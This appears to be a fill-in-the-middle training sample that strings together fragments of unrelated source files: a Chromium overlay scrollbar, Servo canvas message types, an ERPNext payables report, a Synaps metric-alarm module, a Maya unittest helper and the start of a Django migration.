return gfx::Size(kThumbThickness + kThumbHoverOffset,
kThumbThickness + kThumbHoverOffset);
}
void OverlayScrollBar::Thumb::OnPaint(gfx::Canvas* canvas) {
const bool hovered = GetState() != Button::STATE_NORMAL;
cc::PaintFlags fill_flags;
fill_flags.setStyle(cc::PaintFlags::kFill_Style);
fill_flags.setColor(GetColorProvider()->GetColor(
hovered ? ui::kColorOverlayScrollbarFillHovered
: ui::kColorOverlayScrollbarFill));
gfx::RectF fill_bounds(GetLocalBounds());
fill_bounds.Inset(gfx::InsetsF(IsHorizontal() ? kThumbHoverOffset : 0,
IsHorizontal() ? 0 : kThumbHoverOffset, 0, 0));
fill_bounds.Inset(gfx::InsetsF(kThumbStroke, kThumbStroke,
IsHorizontal() ? 0 : kThumbStroke,
IsHorizontal() ? kThumbStroke : 0));
canvas->DrawRect(fill_bounds, fill_flags);
cc::PaintFlags stroke_flags;
stroke_flags.setStyle(cc::PaintFlags::kStroke_Style);
stroke_flags.setColor(GetColorProvider()->GetColor(
hovered ? ui::kColorOverlayScrollbarStrokeHovered
: ui::kColorOverlayScrollbarStroke));
stroke_flags.setStrokeWidth(kThumbStrokeVisualSize);
stroke_flags.setStrokeCap(cc::PaintFlags::kSquare_Cap);
// The stroke is a single pixel, so we must deal with the unscaled canvas.
const float dsf = canvas->UndoDeviceScaleFactor();
gfx::RectF stroke_bounds(fill_bounds);
stroke_bounds.Scale(dsf);
// The stroke should be aligned to the pixel center that is nearest the fill,
// so outset by a half pixel.
stroke_bounds.Inset(gfx::InsetsF(-kThumbStrokeVisualSize / 2.0f));
// The stroke doesn't apply to the far edge of the thumb.
SkPath path;
path.moveTo(gfx::PointFToSkPoint(stroke_bounds.top_right()));
path.lineTo(gfx::PointFToSkPoint(stroke_bounds.origin()));
path.lineTo(gfx::PointFToSkPoint(stroke_bounds.bottom_left()));
if (IsHorizontal()) {
path.moveTo(gfx::PointFToSkPoint(stroke_bounds.bottom_right()));
path.close();
} else {
path.lineTo(gfx::PointFToSkPoint(stroke_bounds.bottom_right()));
}
canvas->DrawPath(path, stroke_flags);
}
void OverlayScrollBar::Thumb::OnBoundsChanged(
const gfx::Rect& previous_bounds) {
scroll_bar_->Show();
// Don't start the hide countdown if the thumb is still hovered or pressed.
if (GetState() == Button::STATE_NORMAL)
scroll_bar_->StartHideCountdown();
}
void OverlayScrollBar::Thumb::OnStateChanged() {
if (GetState() == Button::STATE_NORMAL) {
gfx::Transform translation;
const int direction = base::i18n::IsRTL() ? -1 : 1;
translation.Translate(
gfx::Vector2d(IsHorizontal() ? 0 : direction * kThumbHoverOffset,
IsHorizontal() ? kThumbHoverOffset : 0));
layer()->SetTransform(translation);
if (GetWidget())
scroll_bar_->StartHideCountdown();
} else {
layer()->SetTransform(gfx::Transform());
}
SchedulePaint();
}
OverlayScrollBar::OverlayScrollBar(bool horizontal) : ScrollBar(horizontal) {
SetNotifyEnterExitOnChild(true);
SetPaintToLayer();
layer()->SetMasksToBounds(true);
layer()->SetFillsBoundsOpaquely(false);
// Allow the thumb to take up the whole size of the scrollbar. Layout need
// only set the thumb cross-axis coordinate; ScrollBar::Update() will set the
// thumb size/offset.
SetLayoutManager(std::make_unique<views::FillLayout>());
auto* thumb = new Thumb(this);
SetThumb(thumb);
thumb->Init();
}
OverlayScrollBar::~OverlayScrollBar() = default;
gfx::Insets OverlayScrollBar::GetInsets() const {
return IsHorizontal() ? gfx::Insets(-kThumbHoverOffset, 0, 0, 0)
: gfx::Insets(0, -kThumbHoverOffset, 0, 0);
}
void OverlayScrollBar::OnMouseEntered(const ui::MouseEvent& event) {
Show();
}
void OverlayScrollBar::OnMouseExited(const ui::MouseEvent& event) {
StartHideCountdown();
}
bool OverlayScrollBar::OverlapsContent() const {
return true;
}
gfx::Rect OverlayScrollBar::GetTrackBounds() const {
return GetContentsBounds();
}
int OverlayScrollBar::GetThickness() const {
return kThumbThickness;
}
void OverlayScrollBar::Show() {
layer()->SetOpacity(1.0f);
hide_timer_.Stop();
}
void OverlayScrollBar::Hide() {
ui::ScopedLayerAnimationSettings settings(layer()->GetAnimator());
settings.SetTransitionDuration(ui::kOverlayScrollbarFadeDuration);
layer()->SetOpacity(0.0f);
}
void OverlayScrollBar::StartHideCountdown() {
if (IsMouseHovered())
return;
hide_timer_.Start(
FROM_HERE, ui::kOverlayScrollbarFadeDelay,
base::BindOnce(&OverlayScrollBar::Hide, base::Unretained(this)));
}
BEGIN_METADATA(OverlayScrollBar, ScrollBar)
END_METADATA
} // namespace views<|fim▁end|>
|
#include "base/macros.h"
#include "cc/paint/paint_flags.h"
|
<|file_name|>lib.rs<|end_file_name|><|fim▁begin|>/* This Source Code Form is subject to the terms of the Mozilla Public
* License, v. 2.0. If a copy of the MPL was not distributed with this
* file, You can obtain one at http://mozilla.org/MPL/2.0/. */
#![crate_name = "canvas_traits"]
#![crate_type = "rlib"]
#![feature(custom_derive)]
#![feature(plugin)]
#![plugin(heapsize_plugin, plugins, serde_macros)]
#![deny(unsafe_code)]
extern crate azure;
extern crate core;
extern crate cssparser;
extern crate euclid;
extern crate gfx_traits;
extern crate heapsize;
extern crate ipc_channel;
extern crate serde;
extern crate webrender_traits;
use azure::azure::{AzColor, AzFloat};
use azure::azure_hl::{CapStyle, CompositionOp, JoinStyle};
use azure::azure_hl::{ColorPattern, DrawTarget, Pattern};
use azure::azure_hl::{ExtendMode, GradientStop, LinearGradientPattern, RadialGradientPattern};
use azure::azure_hl::{SurfaceFormat, SurfacePattern};
use cssparser::RGBA;
use euclid::matrix2d::Matrix2D;
use euclid::point::Point2D;
use euclid::rect::Rect;
use euclid::size::Size2D;
use gfx_traits::color;
use ipc_channel::ipc::{IpcSender, IpcSharedMemory};
use std::default::Default;
use std::str::FromStr;
use webrender_traits::{WebGLCommand, WebGLContextId};
#[derive(Clone, Deserialize, Serialize)]
pub enum FillRule {
Nonzero,
Evenodd,
}
#[derive(Clone, Deserialize, Serialize)]
pub enum CanvasMsg {
Canvas2d(Canvas2dMsg),
Common(CanvasCommonMsg),
FromLayout(FromLayoutMsg),
WebGL(WebGLCommand),
}
#[derive(Clone, Deserialize, Serialize)]
pub enum CanvasCommonMsg {
Close,
Recreate(Size2D<i32>),
}
#[derive(Clone, Deserialize, Serialize)]
pub enum CanvasData {
Pixels(CanvasPixelData),
WebGL(WebGLContextId),
}
#[derive(Clone, Deserialize, Serialize)]
pub struct CanvasPixelData {
pub image_data: IpcSharedMemory,
pub image_key: Option<webrender_traits::ImageKey>,
}
#[derive(Clone, Deserialize, Serialize)]
pub enum FromLayoutMsg {
SendData(IpcSender<CanvasData>),
}
#[derive(Clone, Deserialize, Serialize)]
pub enum Canvas2dMsg {
Arc(Point2D<f32>, f32, f32, f32, bool),
ArcTo(Point2D<f32>, Point2D<f32>, f32),
DrawImage(Vec<u8>, Size2D<f64>, Rect<f64>, Rect<f64>, bool),
DrawImageSelf(Size2D<f64>, Rect<f64>, Rect<f64>, bool),
BeginPath,
BezierCurveTo(Point2D<f32>, Point2D<f32>, Point2D<f32>),<|fim▁hole|> FillRect(Rect<f32>),
GetImageData(Rect<i32>, Size2D<f64>, IpcSender<Vec<u8>>),
IsPointInPath(f64, f64, FillRule, IpcSender<bool>),
LineTo(Point2D<f32>),
MoveTo(Point2D<f32>),
PutImageData(Vec<u8>, Point2D<f64>, Size2D<f64>, Rect<f64>),
QuadraticCurveTo(Point2D<f32>, Point2D<f32>),
Rect(Rect<f32>),
RestoreContext,
SaveContext,
StrokeRect(Rect<f32>),
Stroke,
SetFillStyle(FillOrStrokeStyle),
SetStrokeStyle(FillOrStrokeStyle),
SetLineWidth(f32),
SetLineCap(LineCapStyle),
SetLineJoin(LineJoinStyle),
SetMiterLimit(f32),
SetGlobalAlpha(f32),
SetGlobalComposition(CompositionOrBlending),
SetTransform(Matrix2D<f32>),
SetShadowOffsetX(f64),
SetShadowOffsetY(f64),
SetShadowBlur(f64),
SetShadowColor(RGBA),
}
#[derive(Clone, Deserialize, Serialize, HeapSizeOf)]
pub struct CanvasGradientStop {
pub offset: f64,
pub color: RGBA,
}
#[derive(Clone, Deserialize, Serialize, HeapSizeOf)]
pub struct LinearGradientStyle {
pub x0: f64,
pub y0: f64,
pub x1: f64,
pub y1: f64,
pub stops: Vec<CanvasGradientStop>
}
impl LinearGradientStyle {
pub fn new(x0: f64, y0: f64, x1: f64, y1: f64, stops: Vec<CanvasGradientStop>)
-> LinearGradientStyle {
LinearGradientStyle {
x0: x0,
y0: y0,
x1: x1,
y1: y1,
stops: stops,
}
}
}
#[derive(Clone, Deserialize, Serialize, HeapSizeOf)]
pub struct RadialGradientStyle {
pub x0: f64,
pub y0: f64,
pub r0: f64,
pub x1: f64,
pub y1: f64,
pub r1: f64,
pub stops: Vec<CanvasGradientStop>
}
impl RadialGradientStyle {
pub fn new(x0: f64, y0: f64, r0: f64, x1: f64, y1: f64, r1: f64, stops: Vec<CanvasGradientStop>)
-> RadialGradientStyle {
RadialGradientStyle {
x0: x0,
y0: y0,
r0: r0,
x1: x1,
y1: y1,
r1: r1,
stops: stops,
}
}
}
#[derive(Clone, Deserialize, Serialize)]
pub struct SurfaceStyle {
pub surface_data: Vec<u8>,
pub surface_size: Size2D<i32>,
pub repeat_x: bool,
pub repeat_y: bool,
}
impl SurfaceStyle {
pub fn new(surface_data: Vec<u8>, surface_size: Size2D<i32>, repeat_x: bool, repeat_y: bool)
-> SurfaceStyle {
SurfaceStyle {
surface_data: surface_data,
surface_size: surface_size,
repeat_x: repeat_x,
repeat_y: repeat_y,
}
}
}
#[derive(Clone, Deserialize, Serialize)]
pub enum FillOrStrokeStyle {
Color(RGBA),
LinearGradient(LinearGradientStyle),
RadialGradient(RadialGradientStyle),
Surface(SurfaceStyle),
}
impl FillOrStrokeStyle {
pub fn to_azure_pattern(&self, drawtarget: &DrawTarget) -> Option<Pattern> {
match *self {
FillOrStrokeStyle::Color(ref color) => {
Some(Pattern::Color(ColorPattern::new(color::new(color.red,
color.green,
color.blue,
color.alpha))))
},
FillOrStrokeStyle::LinearGradient(ref linear_gradient_style) => {
let gradient_stops: Vec<GradientStop> = linear_gradient_style.stops.iter().map(|s| {
GradientStop {
offset: s.offset as AzFloat,
color: color::new(s.color.red, s.color.green, s.color.blue, s.color.alpha)
}
}).collect();
Some(Pattern::LinearGradient(LinearGradientPattern::new(
&Point2D::new(linear_gradient_style.x0 as AzFloat, linear_gradient_style.y0 as AzFloat),
&Point2D::new(linear_gradient_style.x1 as AzFloat, linear_gradient_style.y1 as AzFloat),
drawtarget.create_gradient_stops(&gradient_stops, ExtendMode::Clamp),
&Matrix2D::identity())))
},
FillOrStrokeStyle::RadialGradient(ref radial_gradient_style) => {
let gradient_stops: Vec<GradientStop> = radial_gradient_style.stops.iter().map(|s| {
GradientStop {
offset: s.offset as AzFloat,
color: color::new(s.color.red, s.color.green, s.color.blue, s.color.alpha)
}
}).collect();
Some(Pattern::RadialGradient(RadialGradientPattern::new(
&Point2D::new(radial_gradient_style.x0 as AzFloat, radial_gradient_style.y0 as AzFloat),
&Point2D::new(radial_gradient_style.x1 as AzFloat, radial_gradient_style.y1 as AzFloat),
radial_gradient_style.r0 as AzFloat, radial_gradient_style.r1 as AzFloat,
drawtarget.create_gradient_stops(&gradient_stops, ExtendMode::Clamp),
&Matrix2D::identity())))
},
FillOrStrokeStyle::Surface(ref surface_style) => {
drawtarget.create_source_surface_from_data(&surface_style.surface_data,
surface_style.surface_size,
surface_style.surface_size.width * 4,
SurfaceFormat::B8G8R8A8)
.map(|source_surface| {
Pattern::Surface(SurfacePattern::new(
source_surface.azure_source_surface,
surface_style.repeat_x,
surface_style.repeat_y,
&Matrix2D::identity()))
})
}
}
}
}
#[derive(Copy, Clone, PartialEq, Deserialize, Serialize, HeapSizeOf)]
pub enum LineCapStyle {
Butt = 0,
Round = 1,
Square = 2,
}
impl FromStr for LineCapStyle {
type Err = ();
fn from_str(string: &str) -> Result<LineCapStyle, ()> {
match string {
"butt" => Ok(LineCapStyle::Butt),
"round" => Ok(LineCapStyle::Round),
"square" => Ok(LineCapStyle::Square),
_ => Err(()),
}
}
}
impl LineCapStyle {
pub fn to_azure_style(&self) -> CapStyle {
match *self {
LineCapStyle::Butt => CapStyle::Butt,
LineCapStyle::Round => CapStyle::Round,
LineCapStyle::Square => CapStyle::Square,
}
}
}
#[derive(Copy, Clone, PartialEq, Deserialize, Serialize, HeapSizeOf)]
pub enum LineJoinStyle {
Round = 0,
Bevel = 1,
Miter = 2,
}
impl FromStr for LineJoinStyle {
type Err = ();
fn from_str(string: &str) -> Result<LineJoinStyle, ()> {
match string {
"round" => Ok(LineJoinStyle::Round),
"bevel" => Ok(LineJoinStyle::Bevel),
"miter" => Ok(LineJoinStyle::Miter),
_ => Err(()),
}
}
}
impl LineJoinStyle {
pub fn to_azure_style(&self) -> JoinStyle {
match *self {
LineJoinStyle::Round => JoinStyle::Round,
LineJoinStyle::Bevel => JoinStyle::Bevel,
LineJoinStyle::Miter => JoinStyle::Miter,
}
}
}
#[derive(Copy, Clone, PartialEq, Deserialize, Serialize)]
pub enum RepetitionStyle {
Repeat,
RepeatX,
RepeatY,
NoRepeat,
}
impl FromStr for RepetitionStyle {
type Err = ();
fn from_str(string: &str) -> Result<RepetitionStyle, ()> {
match string {
"repeat" => Ok(RepetitionStyle::Repeat),
"repeat-x" => Ok(RepetitionStyle::RepeatX),
"repeat-y" => Ok(RepetitionStyle::RepeatY),
"no-repeat" => Ok(RepetitionStyle::NoRepeat),
_ => Err(()),
}
}
}
#[derive(Copy, Clone, PartialEq, Deserialize, Serialize, HeapSizeOf)]
pub enum CompositionStyle {
SrcIn,
SrcOut,
SrcOver,
SrcAtop,
DestIn,
DestOut,
DestOver,
DestAtop,
Copy,
Lighter,
Xor,
}
impl FromStr for CompositionStyle {
type Err = ();
fn from_str(string: &str) -> Result<CompositionStyle, ()> {
match string {
"source-in" => Ok(CompositionStyle::SrcIn),
"source-out" => Ok(CompositionStyle::SrcOut),
"source-over" => Ok(CompositionStyle::SrcOver),
"source-atop" => Ok(CompositionStyle::SrcAtop),
"destination-in" => Ok(CompositionStyle::DestIn),
"destination-out" => Ok(CompositionStyle::DestOut),
"destination-over" => Ok(CompositionStyle::DestOver),
"destination-atop" => Ok(CompositionStyle::DestAtop),
"copy" => Ok(CompositionStyle::Copy),
"lighter" => Ok(CompositionStyle::Lighter),
"xor" => Ok(CompositionStyle::Xor),
_ => Err(())
}
}
}
impl CompositionStyle {
pub fn to_azure_style(&self) -> CompositionOp {
match *self {
CompositionStyle::SrcIn => CompositionOp::In,
CompositionStyle::SrcOut => CompositionOp::Out,
CompositionStyle::SrcOver => CompositionOp::Over,
CompositionStyle::SrcAtop => CompositionOp::Atop,
CompositionStyle::DestIn => CompositionOp::DestIn,
CompositionStyle::DestOut => CompositionOp::DestOut,
CompositionStyle::DestOver => CompositionOp::DestOver,
CompositionStyle::DestAtop => CompositionOp::DestAtop,
CompositionStyle::Copy => CompositionOp::Source,
CompositionStyle::Lighter => CompositionOp::Add,
CompositionStyle::Xor => CompositionOp::Xor,
}
}
pub fn to_str(&self) -> &str {
match *self {
CompositionStyle::SrcIn => "source-in",
CompositionStyle::SrcOut => "source-out",
CompositionStyle::SrcOver => "source-over",
CompositionStyle::SrcAtop => "source-atop",
CompositionStyle::DestIn => "destination-in",
CompositionStyle::DestOut => "destination-out",
CompositionStyle::DestOver => "destination-over",
CompositionStyle::DestAtop => "destination-atop",
CompositionStyle::Copy => "copy",
CompositionStyle::Lighter => "lighter",
CompositionStyle::Xor => "xor",
}
}
}
#[derive(Copy, Clone, PartialEq, Deserialize, Serialize, HeapSizeOf)]
pub enum BlendingStyle {
Multiply,
Screen,
Overlay,
Darken,
Lighten,
ColorDodge,
ColorBurn,
HardLight,
SoftLight,
Difference,
Exclusion,
Hue,
Saturation,
Color,
Luminosity,
}
impl FromStr for BlendingStyle {
type Err = ();
fn from_str(string: &str) -> Result<BlendingStyle, ()> {
match string {
"multiply" => Ok(BlendingStyle::Multiply),
"screen" => Ok(BlendingStyle::Screen),
"overlay" => Ok(BlendingStyle::Overlay),
"darken" => Ok(BlendingStyle::Darken),
"lighten" => Ok(BlendingStyle::Lighten),
"color-dodge" => Ok(BlendingStyle::ColorDodge),
"color-burn" => Ok(BlendingStyle::ColorBurn),
"hard-light" => Ok(BlendingStyle::HardLight),
"soft-light" => Ok(BlendingStyle::SoftLight),
"difference" => Ok(BlendingStyle::Difference),
"exclusion" => Ok(BlendingStyle::Exclusion),
"hue" => Ok(BlendingStyle::Hue),
"saturation" => Ok(BlendingStyle::Saturation),
"color" => Ok(BlendingStyle::Color),
"luminosity" => Ok(BlendingStyle::Luminosity),
_ => Err(())
}
}
}
impl BlendingStyle {
pub fn to_azure_style(&self) -> CompositionOp {
match *self {
BlendingStyle::Multiply => CompositionOp::Multiply,
BlendingStyle::Screen => CompositionOp::Screen,
BlendingStyle::Overlay => CompositionOp::Overlay,
BlendingStyle::Darken => CompositionOp::Darken,
BlendingStyle::Lighten => CompositionOp::Lighten,
BlendingStyle::ColorDodge => CompositionOp::ColorDodge,
BlendingStyle::ColorBurn => CompositionOp::ColorBurn,
BlendingStyle::HardLight => CompositionOp::HardLight,
BlendingStyle::SoftLight => CompositionOp::SoftLight,
BlendingStyle::Difference => CompositionOp::Difference,
BlendingStyle::Exclusion => CompositionOp::Exclusion,
BlendingStyle::Hue => CompositionOp::Hue,
BlendingStyle::Saturation => CompositionOp::Saturation,
BlendingStyle::Color => CompositionOp::Color,
BlendingStyle::Luminosity => CompositionOp::Luminosity,
}
}
pub fn to_str(&self) -> &str {
match *self {
BlendingStyle::Multiply => "multiply",
BlendingStyle::Screen => "screen",
BlendingStyle::Overlay => "overlay",
BlendingStyle::Darken => "darken",
BlendingStyle::Lighten => "lighten",
BlendingStyle::ColorDodge => "color-dodge",
BlendingStyle::ColorBurn => "color-burn",
BlendingStyle::HardLight => "hard-light",
BlendingStyle::SoftLight => "soft-light",
BlendingStyle::Difference => "difference",
BlendingStyle::Exclusion => "exclusion",
BlendingStyle::Hue => "hue",
BlendingStyle::Saturation => "saturation",
BlendingStyle::Color => "color",
BlendingStyle::Luminosity => "luminosity",
}
}
}
#[derive(Copy, Clone, PartialEq, Deserialize, Serialize, HeapSizeOf)]
pub enum CompositionOrBlending {
Composition(CompositionStyle),
Blending(BlendingStyle),
}
impl Default for CompositionOrBlending {
fn default() -> CompositionOrBlending {
CompositionOrBlending::Composition(CompositionStyle::SrcOver)
}
}
impl FromStr for CompositionOrBlending {
type Err = ();
fn from_str(string: &str) -> Result<CompositionOrBlending, ()> {
if let Ok(op) = CompositionStyle::from_str(string) {
return Ok(CompositionOrBlending::Composition(op));
}
if let Ok(op) = BlendingStyle::from_str(string) {
return Ok(CompositionOrBlending::Blending(op));
}
Err(())
}
}
impl CompositionOrBlending {
pub fn to_azure_style(&self) -> CompositionOp {
match *self {
CompositionOrBlending::Composition(op) => op.to_azure_style(),
CompositionOrBlending::Blending(op) => op.to_azure_style(),
}
}
}
pub trait ToAzColor {
fn to_azcolor(&self) -> AzColor;
}
impl ToAzColor for RGBA {
fn to_azcolor(&self) -> AzColor {
color::rgba(self.red as AzFloat,
self.green as AzFloat,
self.blue as AzFloat,
self.alpha as AzFloat)
}
}<|fim▁end|>
|
ClearRect(Rect<f32>),
Clip,
ClosePath,
Fill,
|
<|file_name|>accounts_payable.py<|end_file_name|><|fim▁begin|># Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt<|fim▁hole|>
def execute(filters=None):
args = {
"party_type": "Supplier",
"naming_by": ["Buying Settings", "supp_master_name"],
}
return ReceivablePayableReport(filters).run(args)<|fim▁end|>
|
from __future__ import unicode_literals
import frappe
from erpnext.accounts.report.accounts_receivable.accounts_receivable import ReceivablePayableReport
|
<|file_name|>__init__.py<|end_file_name|><|fim▁begin|># -*- coding:utf-8 -*-
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.<|fim▁hole|># Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from synaps.monitor.api import API
from synaps.utils import (validate_email, validate_international_phonenumber,
validate_instance_action,
validate_groupnotification_action)
import json
class Datapoint(object):
"""
The Datapoint data type encapsulates the statistical data that Amazon
CloudWatch computes from metric data.
Average
The average of metric values that correspond to the datapoint.
Type: Double
Maximum
The maximum of the metric value used for the datapoint.
Type: Double
Minimum
The minimum metric value used for the datapoint.
Type: Double
SampleCount
The number of metric values that contributed to the aggregate value of
this datapoint.
Type: Double
Sum
The sum of metric values used for the datapoint.
Type: Double
Timestamp
The time stamp used for the datapoint.
Type: DateTime
Unit
The standard unit used for the datapoint.
Type: String
Valid Values: Seconds | Microseconds | Milliseconds | Bytes |
Kilobytes | Megabytes | Gigabytes | Terabytes | Bits |
Kilobits | Megabits | Gigabits | Terabits | Percent |
Count | Bytes/Second | Kilobytes/Second |
Megabytes/Second | Gigabytes/Second | Terabytes/Second |
Bits/Second | Kilobits/Second | Megabits/Second |
Gigabits/Second | Terabits/Second | Count/Second | None
"""
class Dimension(object):
"""
The Dimension data type further expands on the identity of a metric using
a Name, Value pair.
For examples that use one or more dimensions, see PutMetricData.
Name
The name of the dimension.
Type: String
Length constraints: Minimum length of 1. Maximum length of 255.
Value
The value representing the dimension measurement
Type: String
Length constraints: Minimum length of 1. Maximum length of 255.
"""
class DimensionFilter(object):
"""
The DimensionFilter data type is used to filter ListMetrics results.
Name
The dimension name to be matched.
Type: String
Length constraints: Minimum length of 1. Maximum length of 255.
Value
The value of the dimension to be matched.
Note: Specifying a Name without specifying a Value returns all values
associated with that Name.
Type: String
Length constraints: Minimum length of 1. Maximum length of 255.
"""
class GetMetricStatisticsResult(object):
"""
The output for the GetMetricStatistics action.
Datapoints
The datapoints for the specified metric.
Type: Datapoint list
Label
A label describing the specified metric.
Type: String
"""
class ListMetricsResult(object):
"""
The output for the ListMetrics action.
Metrics
A list of metrics used to generate statistics for an AWS account.
Type: Metric list
NextToken
A string that marks the start of the next batch of returned results.
Type: String
"""
class Metric(object):
"""
The Metric data type contains information about a specific metric. If you
call ListMetrics, Amazon CloudWatch returns information contained by this
data type.
The example in the Examples section publishes two metrics named buffers
and latency. Both metrics are in the examples namespace. Both metrics have
two dimensions, InstanceID and InstanceType.
Dimensions
A list of dimensions associated with the metric.
Type: Dimension list
Length constraints: Minimum of 0 item(s) in the list. Maximum of 10
item(s) in the list.
MetricName
The name of the metric.
Type: String
Length constraints: Minimum length of 1. Maximum length of 255.
Namespace
The namespace of the metric.
Type: String
Length constraints: Minimum length of 1. Maximum length of 255.
"""
def __init__(self, project_id=None, namespace=None, name=None,
dimensions=None):
self.project_id = project_id
self.name = name
self.dimensions = dimensions
class MetricAlarm(object):
OP_MAP = {'>=':'GreaterThanOrEqualToThreshold',
'>':'GreaterThanThreshold',
'<':'LessThanThreshold',
'<=':'LessThanOrEqualToThreshold'}
STATISTICS = ('SampleCount', 'Average', 'Sum', 'Minimum', 'Maximum')
OP_VALUES = OP_MAP.values()
def __init__(self, alarm_name, comparison_operator, evaluation_periods,
metric_name, namespace, period, statistic, threshold,
actions_enabled=False, alarm_actions=[], alarm_description="",
dimensions={}, insufficient_data_actions=[], ok_actions=[],
unit=""):
def validate_actions(actions):
assert (isinstance(actions, list))
for a in actions:
assert (validate_email(a) or
validate_international_phonenumber(a) or
validate_instance_action(a) or
validate_groupnotification_action(a))
assert (isinstance(actions_enabled, bool))
self.actions_enabled = actions_enabled
validate_actions(alarm_actions)
self.alarm_actions = alarm_actions
validate_actions(insufficient_data_actions)
self.insufficient_data_actions = insufficient_data_actions
validate_actions(ok_actions)
self.ok_actions = ok_actions
assert (len(alarm_description) <= 255)
self.alarm_description = alarm_description
assert (len(alarm_name) <= 255)
self.alarm_name = alarm_name
assert (comparison_operator in self.OP_MAP.values())
self.comparison_operator = comparison_operator
assert (isinstance(dimensions, dict))
self.dimensions = dimensions
assert (isinstance(evaluation_periods, int))
self.evaluation_periods = evaluation_periods
assert (len(metric_name) <= 255)
self.metric_name = metric_name
assert (len(namespace) <= 255)
self.namespace = namespace
assert (isinstance(period, int))
self.period = period
assert (statistic in self.STATISTICS)
self.statistic = statistic
self.threshold = threshold
self.unit = unit
self.alarm_arn = None
self.alarm_configuration_updated_timestamp = None
self.state_reason = None
self.state_reason_data = None
self.state_updated_timestamp = None
self.state_value = None
def to_columns(self):
return {
'actions_enabled': self.actions_enabled,
'alarm_actions': json.dumps(self.alarm_actions),
'alarm_arn': self.alarm_arn,
'alarm_configuration_updated_timestamp':
self.alarm_configuration_updated_timestamp,
'alarm_description': self.alarm_description,
'alarm_name': self.alarm_name,
'comparison_operator': self.comparison_operator,
'dimensions':json.dumps(self.dimensions),
'evaluation_periods':self.evaluation_periods,
'insufficient_data_actions': \
json.dumps(self.insufficient_data_actions),
'metric_name':self.metric_name,
'namespace':self.namespace,
'ok_actions':json.dumps(self.ok_actions),
'period':self.period,
'statistic':self.statistic,
'threshold':self.threshold,
'unit':self.unit
}
def __repr__(self):
return "MetricAlarm:%s[%s(%s) %s %s]" % (self.alarm_name,
self.metric_name,
self.statistic,
self.comparison_operator,
self.threshold)
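# A minimal construction sketch (all values are illustrative; the email
# address assumes validate_email accepts plain addresses):
#
#   alarm = MetricAlarm(
#       alarm_name="high-cpu",
#       comparison_operator="GreaterThanOrEqualToThreshold",
#       evaluation_periods=3,
#       metric_name="CPUUtilization",
#       namespace="AWS/EC2",
#       period=60,
#       statistic="Average",
#       threshold=90.0,
#       alarm_actions=["ops@example.com"],
#   )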
class MetricDatum(object):
"""
The MetricDatum data type encapsulates the information sent with
PutMetricData to either create a new metric or add new values to be
aggregated into an existing metric.
Dimensions
A list of dimensions associated with the metric.
Type: Dimension list
Length constraints: Minimum of 0 item(s) in the list. Maximum of 10
item(s) in the list.
MetricName
The name of the metric.
Type: String
Length constraints: Minimum length of 1. Maximum length of 255.
StatisticValues
A set of statistical values describing the metric.
Type: StatisticSet
Timestamp
The time stamp used for the metric. If not specified, the default
value is set to the time the metric data was received.
Type: DateTime
Unit
The unit of the metric.
Type: String
Valid Values: Seconds | Microseconds | Milliseconds | Bytes |
Kilobytes | Megabytes | Gigabytes | Terabytes | Bits |
Kilobits | Megabits | Gigabits | Terabits | Percent |
Count | Bytes/Second | Kilobytes/Second |
Megabytes/Second | Gigabytes/Second | Terabytes/Second |
Bits/Second | Kilobits/Second | Megabits/Second |
Gigabits/Second | Terabits/Second | Count/Second | None
Value
The value for the metric.
Important: Although the Value parameter accepts numbers of type
Double, Amazon CloudWatch truncates values with very large exponents.
Values with base-10 exponents greater than 126 (1 x 10^126) are
truncated. Likewise, values with base-10 exponents less than -130
(1 x 10^-130) are also truncated.
Type: Double
"""
class StatisticSet(object):
"""
The StatisticSet data type describes the StatisticValues component of
MetricDatum, and represents a set of statistics that describes a specific
metric.
Maximum
The maximum value of the sample set.
Type: Double
Minimum
The minimum value of the sample set.
Type: Double
SampleCount
The number of samples used for the statistic set.
Type: Double
Sum
The sum of values for the sample set.
Type: Double
"""<|fim▁end|>
|
# Copyright (c) 2012 Samsung SDS Co., LTD
# All Rights Reserved.
#
|
<|file_name|>mayatestcase.py<|end_file_name|><|fim▁begin|>"""This is a really rough implementation but demonstrates the
core ideas."""<|fim▁hole|>import os
import unittest
try:
import maya
ISMAYA = True
except ImportError:
maya, ISMAYA = None, False
from mayaserver.client import start_process, create_client, sendrecv
class MayaTestCase(unittest.TestCase):
def _setUp(self):
cls = self.__class__
if hasattr(cls, '_setupRan'):
return
cls.reqport = start_process()
cls.reqsock = create_client(cls.reqport)
appendstr = 'import sys; sys.path.append(%r)' % (
os.path.dirname(__file__))
sendrecv(cls.reqsock, ('exec', appendstr))
cls.testmodule = cls.__module__
cls.testalias = cls.testmodule.replace('.', '_')
impstr = 'import %s as %s' % (cls.testmodule, cls.testalias)
sendrecv(cls.reqsock, ('exec', impstr))
MayaTestCase._setupRan = True
def run(self, result=None):
if ISMAYA:
unittest.TestCase.run(self, result)
return
def wrappedTest():
self.__testMethodName = self._testMethodName
try:
self._wrappedTest()
finally:
self._testMethodName = self.__testMethodName
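        # setUp and tearDown execute inside Maya via _wrappedTest, so the
        # local hooks are disabled before running the wrapped test.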
self.setUp = lambda: None
self.tearDown = lambda: None
self._setUp()
setattr(self, self._testMethodName, wrappedTest)
unittest.TestCase.run(self, result)
def _wrappedTest(self):
strargs = dict(testmodule=self.testalias,
testcase=self.__class__.__name__,
testfunc=self._testMethodName)
teststr = """tc = {testmodule}.{testcase}("{testfunc}")
try:
tc.setUp()
tc.{testfunc}()
finally:
tc.tearDown()""".format(**strargs)
try:
sendrecv(self.reqsock, ('exec', teststr))
except RuntimeError as ex:
if 'AssertionError' in str(ex):
raise AssertionError(*ex.args)
raise<|fim▁end|>
| |
<|file_name|>0001_initial.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# Generated by Django 1.9.1 on 2016-02-04 05:22
from __future__ import unicode_literals
from django.conf import settings
import django.core.validators<|fim▁hole|>
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Policy',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
